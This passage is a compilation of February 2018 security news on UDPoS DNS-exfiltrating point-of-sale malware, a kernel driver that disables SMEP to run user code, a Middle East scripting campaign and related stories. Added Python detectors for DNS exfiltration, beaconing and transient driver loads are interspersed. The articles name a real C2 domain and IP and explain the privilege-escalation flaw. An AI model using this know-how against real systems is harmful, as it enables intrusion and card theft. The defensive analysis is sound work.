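Checking the installed core version is the one verification step an administrator can script across many sites. The following is an added example, not code from WordPress or WordFence; it parses the `$wp_version` declaration that the real `wp-includes/version.php` file contains, and the sample file contents below are constructed for a site still on the broken release.

```python
import re

# Constructed contents of wp-includes/version.php. The real file declares
# $wp_version in exactly this form; the value is a stand-in for a site that
# received the broken 4.9.3 release.
SAMPLE_VERSION_PHP = """<?php
/**
 * Holds the WordPress version.
 */
$wp_version = '4.9.3';
"""

BROKEN_VERSION = "4.9.3"  # release whose auto-update check hits the fatal error
FIXED_VERSION = "4.9.4"   # first release that has to be applied by hand

_VERSION_RE = re.compile(r"^\$wp_version\s*=\s*'([^']+)';", re.MULTILINE)


def core_version(version_php: str) -> str:
    """Extract the $wp_version string from version.php contents."""
    match = _VERSION_RE.search(version_php)
    if not match:
        raise ValueError("no $wp_version declaration found")
    return match.group(1)


def version_tuple(version: str):
    # '4.9.4' -> (4, 9, 4); tuples compare correctly where strings do not
    # ('4.10.0' > '4.9.4'). Non-numeric suffixes such as '-alpha' are dropped.
    return tuple(int(p) for p in re.split(r"[^0-9]+", version) if p)


def update_status(version_php: str) -> dict:
    """Classify an install: stuck on 4.9.3 (manual update required),
    already at 4.9.4 or later, or older than 4.9.3 (unaffected by this bug)."""
    current = core_version(version_php)
    cur, broken, fixed = map(version_tuple, (current, BROKEN_VERSION, FIXED_VERSION))
    if cur == broken:
        return {"version": current, "manual_update_required": True,
                "reason": "4.9.3 auto-updater is broken; use Dashboard -> Updates -> Update Now"}
    if cur >= fixed:
        return {"version": current, "manual_update_required": False,
                "reason": "core is at 4.9.4 or later"}
    return {"version": current, "manual_update_required": False,
            "reason": "older than 4.9.3; not affected by this bug, update normally"}


if __name__ == "__main__":
    status = update_status(SAMPLE_VERSION_PHP)
    print(f"WordPress {status['version']}: {status['reason']}")
```

Reading the file directly, rather than trusting the dashboard, also catches the case the article mentions where an install silently received both updates: the version string will already read 4.9.4 and no manual action is needed.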
However, not all websites that received the faulty update have exhibited this bug. Some users have seen their websites install both updates (4.9.3 and 4.9.4) automatically.
Moreover, the company released two new maintenance updates this week, but none of them includes a security patch for a severe application-level DoS vulnerability disclosed last week that could allow anyone to take down most WordPress websites even with a single machine.
Since WordPress sites are frequent targets of hackers owing to WordPress's wide popularity in the content management system (CMS) market, administrators are advised to always keep their software and plugins up-to-date.


New Point-of-Sale Malware Steals Credit Card Data via DNS Queries
9.2.2018 thehackernews
Virus

Cybercriminals are becoming more adept, innovative, and stealthy with each passing day. They are now adopting more clandestine techniques that come with limitless attack vectors and are harder to detect.
A new strain of malware has now been discovered that relies on a unique technique to steal payment card information from point-of-sale (PoS) systems.
Since the new POS malware relies upon User Datagram Protocol (UDP) DNS traffic for the exfiltration of credit card information, security researchers at Forcepoint Labs, who have uncovered the malware, dubbed it UDPoS.
Yes, UDPoS uses Domain Name System (DNS) queries to exfiltrate stolen data, instead of HTTP, which has been used by most POS malware in the past. This malware is also thought to be the first of its kind.
Besides using 'unusual' DNS requests to exfiltrate data, the UDPoS malware disguises itself as an update from LogMeIn—a legitimate remote desktop control service used to manage computers and other systems remotely—in an attempt to avoid detection while transferring stolen payment card data past firewalls and other security controls.
"We recently came across a sample apparently disguised as a LogMeIn service pack which generated notable amounts of 'unusual' DNS requests," Forcepoint researchers said in a blogpost published Thursday.
"Deeper investigation revealed something of a flawed gem, ultimately designed to steal magnetic stripe payment card data: a hallmark of PoS malware."
The malware sample analyzed by the researchers links to a command and control (C&C) server hosted in Switzerland rather than the usual suspects of the United States, China, Korea, Turkey or Russia. The server hosts a dropper file, which is a self-extracting archive containing the actual malware.
It should be noted that the UDPoS malware can only target older POS systems that use LogMeIn.
Like most malware, UDPoS also actively searches for antivirus software and virtual machines and disables them if it finds any. The researchers say it's unclear "at present whether this is a reflection of the malware still being in a relatively early stage of development/testing."
Although there is no evidence of the UDPoS malware currently being used to steal credit or debit card data, Forcepoint's tests have shown that the malware is indeed capable of doing so successfully.
Moreover, one of the C&C servers with which the UDPoS malware sample communicates was active and responsive during the investigation of the threat, suggesting the authors were at least prepared to deploy this malware in the wild.
It should be noted that the attackers behind the malware have not compromised the LogMeIn service itself—it's just impersonated. LogMeIn itself published a blogpost this week, warning its customers not to fall for the scam.
"According to our investigation, the malware is intended to deceive an unsuspecting user into executing a malicious email, link or file, possibly containing the LogMeIn name," LogMeIn noted.
"This link, file or executable isn't provided by LogMeIn and updates for LogMeIn products, including patches, updates, etc., will always be delivered securely in-product. You'll never be contacted by us with a request to update your software that also includes either an attachment or a link to a new version or update."
According to Forcepoint researchers, protecting against such a threat could be a tricky proposition, as "nearly all companies have firewalls and other protections in place to monitor and filter TCP- and UDP-based communications," but DNS is still often treated differently, providing a golden opportunity for hackers to leak data.
Last year, we came across a Remote Access Trojan (RAT), dubbed DNSMessenger, that uses DNS queries to execute malicious PowerShell commands on compromised computers, making the malware difficult to detect on targeted systems.
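Because DNS is so often exempt from the filtering applied to other UDP and TCP traffic, the practical defence is to inspect resolver logs for the shape of exfiltration rather than its content: one client sending many distinct, long, high-entropy subdomain labels under a single domain. The following detector is an added example, not Forcepoint's or LogMeIn's code; the log-line format, the thresholds, the "last two labels" approximation of a registrable domain and the `svc-updates.example` domain are all assumptions, and the log lines are constructed.

```python
import math
from collections import defaultdict

# Constructed resolver log lines: "<timestamp> <client-ip> <qname> <qtype>".
# Made-up records for illustration, not traffic from the UDPoS sample.
SAMPLE_LOG = """\
2018-02-08T10:00:01 10.0.0.5 www.example.com A
2018-02-08T10:00:02 10.0.0.5 mail.example.com A
2018-02-08T10:00:03 10.0.0.7 www.example.com A
2018-02-08T10:00:04 10.0.0.7 cdn.example.net A
2018-02-08T10:01:00 10.0.0.5 0123456789abcdef0123456789abcdef.svc-updates.example A
2018-02-08T10:01:01 10.0.0.5 fedcba9876543210fedcba9876543210.svc-updates.example A
2018-02-08T10:01:02 10.0.0.5 02468ace13579bdf02468ace13579bdf.svc-updates.example A
2018-02-08T10:01:03 10.0.0.5 13579bdf02468ace13579bdf02468ace.svc-updates.example A
2018-02-08T10:01:04 10.0.0.5 048c159d26ae37bf048c159d26ae37bf.svc-updates.example A
"""

# Detection thresholds: assumed for this example, tune against your own baseline
# (CDNs and some telemetry services legitimately produce many subdomains, but
# rarely long ones with near-random characters).
MIN_UNIQUE_SUBDOMAINS = 5
MIN_MEAN_LABEL_LEN = 20
MIN_MEAN_ENTROPY = 3.0  # bits per character; hex-encoded data approaches 4.0


def shannon_entropy(s: str) -> float:
    """Bits of entropy per character of s (0.0 for an empty or uniform string)."""
    if not s:
        return 0.0
    counts = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def split_qname(qname: str):
    """Return (subdomain labels, base domain). The base domain is approximated
    as the last two labels; a real deployment should use the Public Suffix List."""
    labels = qname.rstrip(".").split(".")
    return labels[:-2], ".".join(labels[-2:])


def parse_log(text: str):
    records = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue  # skip malformed lines instead of crashing the detector
        ts, client, qname, qtype = parts
        records.append((ts, client, qname.lower(), qtype))
    return records


def find_suspicious_domains(records):
    """Return (client, base domain, unique subdomains, mean entropy) for every
    client/domain pair whose leftmost labels look like encoded data."""
    seen = defaultdict(set)  # (client, base domain) -> leftmost labels observed
    for _, client, qname, _ in records:
        subs, base = split_qname(qname)
        if subs:
            seen[(client, base)].add(subs[0])

    flagged = []
    for (client, base), labels in sorted(seen.items()):
        if len(labels) < MIN_UNIQUE_SUBDOMAINS:
            continue
        mean_len = sum(map(len, labels)) / len(labels)
        mean_ent = sum(map(shannon_entropy, labels)) / len(labels)
        if mean_len >= MIN_MEAN_LABEL_LEN and mean_ent >= MIN_MEAN_ENTROPY:
            flagged.append((client, base, len(labels), round(mean_ent, 2)))
    return flagged


if __name__ == "__main__":
    for client, base, n, ent in find_suspicious_domains(parse_log(SAMPLE_LOG)):
        print(f"{client} -> {base}: {n} unique labels, mean entropy {ent} bits/char")
```

The three conditions are deliberately combined: a count threshold alone would flag content-delivery networks, and entropy alone would flag a single long session token. Only the combination, many distinct labels that are both long and close to random, resembles data leaving through the resolver, and it is the resolver log rather than the firewall that exposes it.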


A vulnerable driver: lesson almost learned

9.2.2018 Kaspersky Vulnerability
How not to use a driver to execute code with kernel privileges
Recently, we started receiving suspicious events from our internal sandbox Exploit Checker plugin. Our heuristics for supervisor mode code execution in the user address space were constantly being triggered, and an executable file was being flagged for further analysis. At first, it looked like we’d found a zero-day local privilege escalation vulnerability for Windows, but the sample that was triggering Exploit Checker events turned out to be the clean signed executable GundamOnline.exe, part of the multiplayer online game Mobile Suit Gundam Online from BANDAI NAMCO Online Inc.

The initial sample is packed using a custom packer and contains anti-analysis techniques that complicate static analysis. For example, it tries to detect if it’s being launched inside a virtual machine by performing a well-known VMware hypervisor detection routine. It first loads the EAX register with the hypervisor magic value VMXh, and the ECX register with the value 0x0A, which is a special command to receive the hypervisor version. Then it performs an ‘in’ instruction on the VMware hypervisor I/O port 0x5658. If the EBX register is overwritten with VMXh as a result of that operation, it means the executable file is running on a VMware machine.

Our sandbox execution logs showed that the user space memory page is called from the driver bandainamcoonline.sys immediately after IOCTL request 0xAA012044 to the device object \\.\Htsysm7838 that is created by the driver. The driver itself is installed just before that: it is first dropped to the directory C:\Windows\SysWOW64\ by the GundamOnline executable, loaded using NtLoadDriver() and deleted immediately afterwards.

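The drop, load and delete sequence described above is a behaviour a defender can look for in endpoint telemetry regardless of which driver is involved, together with the unusual location: SysWOW64 is a 32-bit user-mode library directory, not where kernel drivers normally live. The following correlation is an added example, not code from Kaspersky Lab or from Exploit Checker; the event names, the 60-second window, the expected driver directory and the benign example-nic.sys path are assumptions, and the events are constructed.

```python
from datetime import datetime

# Constructed endpoint telemetry: (timestamp, event type, file path). The event
# names "FileCreate", "DriverLoad" and "FileDelete" are assumed here; map your
# own EDR or Sysmon event IDs onto them. The first three paths follow the article.
SAMPLE_EVENTS = [
    ("2018-02-01T12:00:00", "FileCreate", r"C:\Windows\SysWOW64\bandainamcoonline.sys"),
    ("2018-02-01T12:00:01", "DriverLoad", r"C:\Windows\SysWOW64\bandainamcoonline.sys"),
    ("2018-02-01T12:00:02", "FileDelete", r"C:\Windows\SysWOW64\bandainamcoonline.sys"),
    # constructed benign driver install: created, loaded, never deleted
    ("2018-02-01T12:05:00", "FileCreate", r"C:\Windows\System32\drivers\example-nic.sys"),
    ("2018-02-01T12:05:30", "DriverLoad", r"C:\Windows\System32\drivers\example-nic.sys"),
]

MAX_LIFETIME_SECONDS = 60  # drop, load and delete inside a minute is the suspicious pattern

# Assumed baseline: kernel drivers normally reside under System32\drivers.
EXPECTED_DRIVER_DIR = "\\windows\\system32\\drivers\\"


def _parse(ts: str) -> datetime:
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S")


def unusual_driver_location(path: str) -> bool:
    """True when a driver file sits outside the expected driver directory."""
    return EXPECTED_DRIVER_DIR not in path.lower()


def detect_transient_driver_loads(events, max_lifetime=MAX_LIFETIME_SECONDS):
    """Return (path, lifetime in seconds, unusual location) for every .sys file
    that was created, loaded as a driver and deleted again, in that order,
    within max_lifetime seconds."""
    timeline = {}  # normalised path -> {"path": original, event type: first timestamp}
    for ts, kind, path in events:
        if not path.lower().endswith(".sys"):
            continue
        entry = timeline.setdefault(path.lower(), {"path": path})
        entry.setdefault(kind, _parse(ts))  # keep the first occurrence of each event

    hits = []
    for entry in timeline.values():
        if not all(k in entry for k in ("FileCreate", "DriverLoad", "FileDelete")):
            continue
        created, loaded, deleted = entry["FileCreate"], entry["DriverLoad"], entry["FileDelete"]
        lifetime = (deleted - created).total_seconds()
        if created <= loaded <= deleted and lifetime <= max_lifetime:
            hits.append((entry["path"], lifetime, unusual_driver_location(entry["path"])))
    return hits


if __name__ == "__main__":
    for path, lifetime, odd_dir in detect_transient_driver_loads(SAMPLE_EVENTS):
        print(f"{path}: loaded and removed within {lifetime:.0f}s"
              f"{' from an unusual directory' if odd_dir else ''}")
```

The ordering check matters: a driver that is created, loaded and later deleted by an uninstaller over hours is routine, whereas the whole cycle completing inside a minute means the file existed on disk only long enough for the loader to read it, which is exactly what leaves the sandbox log as the only record.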
Normally, this kind of behavior should not be allowed due to SMEP (Supervisor Mode Execution Prevention). This is a security feature present on the latest Intel processors that restricts supervisor mode execution on user memory pages. Page type is determined using the User/Supervisor flag in the page table entry. If a user memory page is called while in supervisor execution mode, SMEP generates an access violation exception and, as a result, the system will trigger a bug check and halt. This is commonly referred to as a BSOD.
 

The dropped driver itself is a legitimate driver, signed with a certificate issued to NAMCO BANDAI Online Inc.

The certificate validity period tells us two things. First, this certificate has been valid since 2012, which could mean that the first vulnerable version of the driver was released around the same time. However, we were unable to find one; the earliest sample of bandainamcoonline.sys that we found dates back to November 2015. Secondly, because it expired more than three years ago, you could be forgiven for thinking it’s impossible to install a driver signed with this certificate in a system. Actually, there’s nothing stopping you from installing and loading a driver with an expired certificate validity period.

In order to find the cause of the heuristics trigger, we need to do a static analysis of the driver itself. In the DriverEntry function it first decodes the device object name string in memory, and then creates the device \\.\Htsysm7838. The other two encoded strings – bandainamcoonline and bandainamcoonline.sys – are not used in the driver.
 

The driver itself is very small and contains only three registered major functions. Function IRP_MJ_DEVICE_CONTROL, which handles requests, accepts only two IOCTLs: 0xAA012044 and 0xAA013044. When called, it checks the size of the input and output buffers and eventually calls the ExecuteUserspaceCode function, passing on the contents of the input buffer to it.
 

The function ExecuteUserspaceCode performs a single check on the input buffer, which contains a pointer to a user space function or a shellcode, and disables SMEP while saving the old CR4 register value. It then calls that function, passing it a pointer to MmGetSystemRoutineAddress as an argument. After that it restores the original register state, re-enabling SMEP.

To call the user function directly through the provided pointer, the driver must first clear a specific bit in the CR4 register to temporarily disable SMEP, which is what the DisableSMEP function does. The original CR4 value is then restored by the EnableSMEP function.

The vulnerability in this case is that other than the basic checks on the format of the input buffer, no additional checks are done. Therefore, any user on the system can use this driver to elevate their privileges and execute arbitrary code in the Ring 0 of the OS. Even if the driver is not present in the system, an attacker can register it with Windows API functions and exploit the flaw.

We realized that this vulnerability looks exactly like the one found in Capcom’s driver last year.
 

Binary diffing bandainamcoonline.sys and capcom.sys proves exactly that, showing there are almost no differences between the two drivers. The only slight variations are the encoded strings and digital signatures. Because the earliest sample of the vulnerable driver that we’ve been able to find dates to November 2015, it can be assumed that this vulnerability first appeared in the bandainamcoonline.sys driver – almost a year before a similar driver was used by Capcom.

We believe both drivers were almost certainly compiled from the same source code, as part of an anti-hacking solution to prevent users from cheating in the game. The presence of functions that explicitly disable and re-enable SMEP shows that this design decision was intentional. But because the driver makes no additional security checks, any user can call and exploit the vulnerable IO control code by using Windows APIs such as DeviceIoControl(). This essentially makes the driver a rootkit, allowing anyone to interact with the operating system at the highest privilege level. In fact, we found multiple malware samples (already detected by our products) using a previously known vulnerability in capcom.sys to elevate their privileges to System level.

After finding the vulnerability we contacted BANDAI NAMCO Online Inc. The vendor responded promptly and released a patch three days later. They removed the driver altogether, and it is no longer loaded by the game executable. This is very similar to what Capcom did, and is perfectly acceptable in this case.

Finding this vulnerability wouldn’t have been possible without our Exploit Checker technology, which is a plugin for our sandbox, and can be also found in KATA (Kaspersky Anti Targeted Attack Platform). The technology was designed to monitor suspicious events that occur at the earliest post-exploitation phases and can detect common techniques used in exploits, such as ROP, Heap Spray, Stack Pivot, and so on. In this particular case, multiple heuristics for executing code in supervisor mode in the user address space were triggered, and the sample was flagged for further analysis. If a token-swapping attempt was performed to elevate process privileges, a technique that’s widely used in LPE exploits, it would have been automatically detected by Exploit Checker heuristics.

Kaspersky Lab solutions detect the vulnerable drivers mentioned in this article as HEUR:HackTool.Win32.Banco.a and HEUR:HackTool.Win32.Capco.a.


Zerodium Offers $45,000 for Linux 0-Days
9.2.2018 securityweek  IT
Hackers willing to find unpatched vulnerabilities in the Linux operating system and report them to exploit acquisition firm Zerodium can earn up to $45,000 for their findings, the company announced on Thursday.

The company has long been acquiring vulnerabilities in Linux as part of its normal payouts program, but it would normally pay only up to $30,000 for Local Privilege Escalation flaws in the operating system. Until March 31, 2018, however, such flaws can earn hackers up to 50% more, Zerodium said on Twitter.

Zerodium (@Zerodium), 4:03 PM - Feb 8, 2018:

"Got a Linux LPE? Working with default installations of Ubuntu, Debian, CentOS/RHEL/Fedora? We are increasing our payouts to $45,000 per #0day exploit until March 31st, 2018. To submit, please check: https://zerodium.com/submit.html"

Zerodium claims that hackers who submit valid zero-day vulnerabilities in products of interest would receive payment for their efforts within a week after the initial submission.

The exploit acquisition firm is targeting vulnerabilities in the most commonly used Linux distributions and interested hackers can head over to its website to learn specific information on what is considered an eligible submission.

The payments promised for Linux vulnerabilities, however, aren’t the highest the company offers.

On desktop platforms, remote code execution flaws in Windows can earn the reporting hacker up to $300,000. Those who discover unpatched vulnerabilities in mobile operating systems can make up to $1,500,000, if the bug affects Apple’s iOS platform.

In fact, Zerodium is already known to have paid a group of hackers $1 million for a zero-day in iOS.

In August 2017, Zerodium announced it was prepared to pay up to $500,000 for unpatched vulnerabilities in popular instant messaging and email applications. The offer remains active in its current program.

In September last year, the company announced it was willing to pay up to $1 million for zero-day flaws in the Tor Browser. The “bounty” program ended in December 2017, but Zerodium wouldn’t provide information on the results of the operation.

Once in the possession of vulnerabilities it considers of interest, the company sells them to its customers as part of the Zerodium Zero-Day Research Feed. The company also says it analyzes, aggregates, and documents the acquired security intelligence before offering it, along with protective measures and security recommendations, to its clients.


New PoS Malware Family Discovered
9.2.2018 securityweek Virus
Researchers have discovered a new Point of Sale (PoS) malware. They cannot tell yet whether it is new code still being developed, or already used -- complete with coding errors -- in an undetected campaign. They suspect the latter.

PoS malware has been responsible for a number of high profile data breaches over the last few years, including Hyatt Hotels, Chipotle Mexican Grill, Avanti Markets, and Sonic Drive-In. The growing use of EMV (chip & pin) payment cards in the U.S. makes card-present fraud more difficult. It was always expected that this would drive criminals towards card-not-present (that is, online) fraud, making the online theft of card details more attractive.

Forcepoint researchers Robert Neumann and Luke Somerville described the malware in a blog analysis posted today. "This appears to be a new family which we are currently calling 'UDPoS' owing to its heavy use of UDP-based DNS traffic." The researchers are not overly impressed by the quality of the coding, describing it as 'a flawed gem' -- where 'flawed' refers to the coding and 'gem' to the excitement of discovering a new needle in the haystack of old malware.

The malware uses a 'LogMeIn' theme as camouflage. The C2 server is service-logmeln.network (with an 'L' rather than an 'I') hosting the dropper file, update.exe. This is a self-extracting 7-Zip archive containing LogmeinServicePack_5.115.22.001.exe and logmeinumon.exe. The former, the service component of the malware, is run automatically by 7-Zip on extraction.

This service component is responsible for setting up its own folder, and establishing persistence. It then passes control to the second, or monitoring, component by launching logmeinumon.exe. The two components have a similar structure, and use the same string encoding technique to hide the name of the C2 server, filenames and hard-coded process names.

The monitor component creates five different threads after attempting an anti-AV and virtual machine check and either creating or loading an existing ‘Machine ID'. The Machine ID is used in all the malware's DNS queries. The anti-AV/VM process is flawed, attempting to open only one of several modules.

When first run, the malware generates a batch file (infobat.bat) to fingerprint the infected device, with details written to a local file before being sent to the C2 server via DNS. The precise reason for this is unclear, but the researchers note, "The network map, list of running processes and list of installed security updates is highly valuable information."

Deeper analysis of the malware revealed a process designed to collect Track 1 and Track 2 payment card data by scraping the memory of running processes. "These processes," say the researchers, "are checked against an embedded and pre-defined blacklist of common system process and browser names with only ones not present on the list being scanned."

If any Track 1/2 data is found, it is sent to the C2 server. A log is also created and stored, "presumably," say the researchers, "for the purpose of keeping track of what has already been submitted to the C2 server."

When the researchers attempted to find additional samples of the same malware family, all they found was a different service component but without a corresponding monitor component. This one had an 'Intel' theme rather than a 'LogMeIn' theme. It was compiled at the end of September 2017, two weeks before the compilation stamp of October 11, 2017 for the LogMeIn components.

"Whether this is a sign that authors of the malware were not successful in deploying it at first or whether these are two different campaigns cannot be fully determined at this time due to the lack of additional executables," note the authors.

They warn that legacy PoS systems -- which can number thousands in large retailers -- are often based on variations of the Windows XP kernel. "While Windows POSReady is in extended support until January 2019, it is still fundamentally an operating system which is seventeen years old this year."

They urge sysadmins to monitor unusual activity patterns; in this case, DNS traffic. "By identifying and reacting to these patterns, businesses -- both PoS terminal owners and suppliers -- can close down this sort of attack sooner."
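The DNS monitoring the researchers recommend, as an added example that is not Forcepoint's code: it triages constructed DNS query logs for the two traits described above, a brand lookalike in the registered domain (the 'l' for 'i' in service-logmeln.network) and a burst of long, high-entropy subdomain labels to one domain, the shape encoded data takes when it leaves over UDP DNS. The brand list, the thresholds and the log format are assumptions.

```python
"""Triage DNS logs for the two UDPoS traits above: a lookalike brand domain (logmeln vs logmein) and
bursts of long, high-entropy labels carrying data over UDP DNS. Added example, not Forcepoint's code."""
import math
from collections import Counter, defaultdict

BRANDS = {"logmein", "intel"}  # assumption: operator-maintained list of imitated brands
_CONFUSABLE = str.maketrans({"1": "l", "i": "l", "0": "o"})

def skeleton(label):
    """Collapse confusable characters: logmeln, logme1n and logmein all become logmeln."""
    return label.lower().translate(_CONFUSABLE).replace("rn", "m").replace("vv", "w")

def lookalike_brand(reg_label):
    """Brand that a hyphen-separated part of a second-level label imitates, or None."""
    parts = reg_label.lower().split("-")
    return next((b for p in parts for b in BRANDS if p != b and skeleton(p) == skeleton(b)), None)

def entropy(s):
    """Shannon entropy in bits per character; encoded payload labels score high."""
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())

def triage(lines, window_s=60, min_queries=20, min_label_len=30, min_entropy=3.0):
    """One finding per (client, registered domain) that trips either check. Log lines are
    'epoch client qname'; registered domain = last two labels (assumption: no public suffix list)."""
    bursts, lookalikes = defaultdict(list), {}
    for line in lines:
        ts, client, qname = line.split()
        labels = qname.rstrip(".").lower().split(".")
        if len(labels) < 2:
            continue
        key = (client, ".".join(labels[-2:]))
        brand = lookalike_brand(labels[-2])
        if brand:
            lookalikes[key] = brand
        data = labels[0] if len(labels) > 2 else ""  # leftmost label carries the payload
        if len(data) >= min_label_len and entropy(data) >= min_entropy:
            bursts[key].append(int(ts))
    findings = []
    for key in sorted(set(bursts) | set(lookalikes)):
        reasons = ["lookalike of " + lookalikes[key]] if key in lookalikes else []
        times, lo, peak = sorted(bursts.get(key, [])), 0, 0
        for hi, t in enumerate(times):  # largest number of queries inside any window_s span
            while t - times[lo] > window_s:
                lo += 1
            peak = max(peak, hi - lo + 1)
        if peak >= min_queries:
            reasons.append("%d payload-shaped queries in %ds" % (peak, window_s))
        if reasons:
            findings.append({"client": key[0], "domain": key[1], "reasons": reasons})
    return findings

def constructed_log():
    """Constructed sample: one PoS host sending encoded data to the lookalike C2, plus benign lookups."""
    lines = ["1507700000 10.0.0.7 www.logmein.com", "1507700003 10.0.0.7 update.intel.com"]
    for i in range(25):  # 25 queries in 48 s, each with a 40-character hex label
        data = "".join("0123456789abcdef"[(i * 7 + 3 * k) % 16] for k in range(40))
        lines.append("%d 10.0.0.5 %s.service-logmeln.network" % (1507700000 + 2 * i, data))
    return lines

if __name__ == "__main__":
    for f in triage(constructed_log()):
        print(f["client"], f["domain"], "; ".join(f["reasons"]))
```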

Austin, Texas based Forcepoint, originally known as Raytheon/Websense, was created in a $1.9 billion deal involving Raytheon, Websense and Vista Equity Partners in April 2015. It was renamed to Forcepoint in January 2016.


Actor Targeting Middle East Shows Excellent OPSEC
9.2.2018 securityweek  Krypto
An actor making extensive use of scripting languages in attacks on targets in the Middle East demonstrates excellent operational security (OPSEC), researchers from Talos say.

These targeted attacks relied on allegedly confidential decoy documents supposedly written by the Jordanian publishing and research house Dar El-Jaleel, along with VBScript, PowerShell, and VBA scripts that dynamically load and execute functions retrieved from a command and control (C&C) server.

The threat actor was particularly careful to camouflage the infrastructure and used several reconnaissance scripts to check the validity of victim machines. The actor was observed blocking systems that didn't meet their criteria, filtering connections based on their User-Agent strings, and hosting the infrastructure on CloudFlare.

Attacks start with a VBScript that creates a second-stage PowerShell script, which in turn creates a Microsoft Office document and opens it. The document was purportedly written by Dar El-Jaleel, an institute well known for its research on the Palestinian-Israeli conflict and the Sunni-Shia conflict in Iran.

Supposedly a confidential analysis report on Iranian activities within the Syrian civil war, the document contains a macro designed to create a WSF (Windows Script File) file and to execute it. The WSF script, Talos discovered, is the main part of the infection and contains a User-Agent used to identify the targets.

The script first registers the infected system with a command and control server and executes an infinite loop, trying to contact the /search URI every 5 seconds to download and execute payloads.
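Detecting the polling pattern described above from the network side, as an added example that is not part of Talos' analysis: a script that requests one URI every 5 seconds leaves near-constant inter-arrival gaps in proxy logs, which human browsing does not, and grouping by User-Agent matters here because the actor used that header to identify targets. The host name c2.example.invalid, the User-Agent string WSF-Target-Alpha and the log format are placeholders.

```python
"""Flag fixed-interval polling (one client, one URI, near-constant gaps) in web proxy
logs, grouped by User-Agent because the actor used that header to identify targets.
Added example, not Talos code; log lines are constructed: 'epoch src host path ua'."""
import statistics
from collections import defaultdict

def inter_arrivals(times):
    """Gaps between consecutive timestamps, in seconds."""
    t = sorted(times)
    return [b - a for a, b in zip(t, t[1:])]

def beacons(lines, min_hits=10, max_jitter=0.2):
    """Return (src, host, path, user_agent, period_s) for every request stream with
    at least min_hits requests whose gap stdev/mean is at most max_jitter. A human
    browses irregularly; a 5-second polling loop produces gaps of almost exactly 5."""
    streams = defaultdict(list)
    for line in lines:
        ts, src, host, path, ua = line.split(" ", 4)  # the UA itself may contain spaces
        streams[(src, host, path, ua)].append(float(ts))
    found = []
    for key, times in streams.items():
        if len(times) < min_hits:
            continue
        gaps = inter_arrivals(times)
        mean = statistics.mean(gaps)
        if mean > 0 and statistics.pstdev(gaps) / mean <= max_jitter:
            found.append(key + (round(mean, 1),))
    return sorted(found)

def constructed_log():
    """Constructed sample: 10.1.1.20 polls /search every ~5 s with a custom User-Agent
    (placeholder values c2.example.invalid and WSF-Target-Alpha); 10.1.1.21 browses."""
    base = 1516000000.0
    poll = [0, 5.2, 10.1, 15.3, 19.9, 25.0, 30.2, 34.8, 40.1, 45.3, 50.0, 55.1]
    browse = [0, 3, 40, 41, 42, 130, 131, 300, 310, 600, 601, 602]
    lines = ["%.1f 10.1.1.20 c2.example.invalid /search WSF-Target-Alpha" % (base + o)
             for o in poll]
    lines += ["%.1f 10.1.1.21 www.example.org / Mozilla/5.0 (Windows NT 6.1) Firefox/58.0"
              % (base + o) for o in browse]
    return lines

if __name__ == "__main__":
    for src, host, path, ua, period in beacons(constructed_log()):
        print("%s -> %s%s every %.1fs, UA %r" % (src, host, path, period, ua))
```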

These payloads are of three types, but all are VBScript functions loaded and executed on the fly using the ExecuteGlobal() and GetRef() APIs, differentiated by the number of arguments supplied: none, one, or two. The security researchers received five different functions, all obfuscated.

A reconnaissance function was received a few minutes after the initial compromise, meant to retrieve information from the infected system: disk volume serial number, installed anti-virus software, Internet IP address, computer name, username, Operating System, and architecture. All data is sent to the C&C. A second reconnaissance function was used to list the drives of the system and their type.

Two functions meant to achieve persistence for the WSF script were received as well: one script was used to persist, while the second was meant to clean the infected system.

The system also received a pivot function, which was meant to execute a PowerShell script. In turn, the script would execute a second base64 encoded script.

One last PowerShell script served to the system was meant to download shellcode from the IP address 176[.]107[.]185[.]246, map it in memory, and execute it. While the shellcode wasn’t retrieved during the investigation, the process revealed the many precautions the attacker takes before delivering the payload.

The attacker’s C&C is protected by CloudFlare, which makes it difficult to track and analyze the campaign. The researchers noticed that the actor was active during the morning (Central European Time zone), and that payloads were only sent during that time.

Furthermore, the attacker’s server becomes unreachable after serving the shellcode (the firewall is disabled for a few minutes to allow the download to go through). The actor was also observed blacklisting some of the researchers’ specific User-Agent strings and IP addresses.

“This high level of OPSEC is exceptional even among presumed state sponsored threat actors,” Talos notes.

The VBScript used during this campaign shows similarities to Jenxcus (also known as Houdini/H-Worm), but the researchers are not sure whether the actor used a “new version of Jenxcus or if this malware served as the inspiration for their own malicious code.”

While Jenxcus’ source code is available on the Internet, the adaptation observed in these attacks is more advanced, with the functions loaded on demand and the initial script including only parts of the code, not all of it.

The security researchers were also able to identify different targets based on the User-Agent and say that targeted campaigns using Dar El-Jaleel decoy documents were observed before. In fact, the same decoy documents were observed in several attacks in 2017, but it is not clear if the same actor is behind all of them.

“These campaigns show us that at least one threat actor is interested in and targeting the Middle East. Due to the nature of the decoy documents, we can conclude that the intended targets have an interest in the geopolitical context of the region,” Talos notes.


Philippine Bank Threatens Counter-Suit Over World's Biggest Cyber-Heist
9.2.2018 securityweek  Cyber
The Philippine bank used by hackers to transfer money in the world's biggest cyber heist warned of tit-for-tat legal action Thursday, after Bangladeshi officials said they would sue the lender.

Unidentified hackers stole $81 million from the Bangladesh central bank's account with the US Federal Reserve in New York two years ago, then transferred it to a Manila branch of the Rizal Commercial Banking Corp (RCBC).

The funds were then swiftly withdrawn and laundered through local casinos.

Bangladeshi officials said Wednesday they are readying a case against RCBC for its alleged role in the heist.

One of the officials, Bangladesh's Finance Minister A.M.A Muhith, said last year he wanted to "wipe out" RCBC.

But RCBC maintained the February 2016 cyber-heist was an "inside job" and that the Philippine bank was being used as a scapegoat to hide the real culprits.

RCBC, one of the Philippines' largest banks, charged that Bangladeshi officials were hiding their own findings into the crime, possibly to conceal the involvement of their own officials in the heist.

"RCBC has had it and will consider a lawsuit against Bangladesh Central Bank officials for claiming the bank had a hand in the $81M cyber-heist," the Philippine lender said in a statement.

"They are perpetuating the cover-up and using RCBC as a scapegoat to keep their people in the dark," the RCBC statement said.

The Philippine central bank imposed a record $21 million fine on RCBC after the discovery of the heist as it investigated the lender's alleged role in the theft.

Only a small amount of the stolen money has been recovered.

Money-laundering charges were also filed against the RCBC branch manager.

The US reserve bank, which manages the Bangladesh Bank reserve account, has denied its own systems were breached.


Flaws Affecting Top-Selling Netgear Routers Disclosed
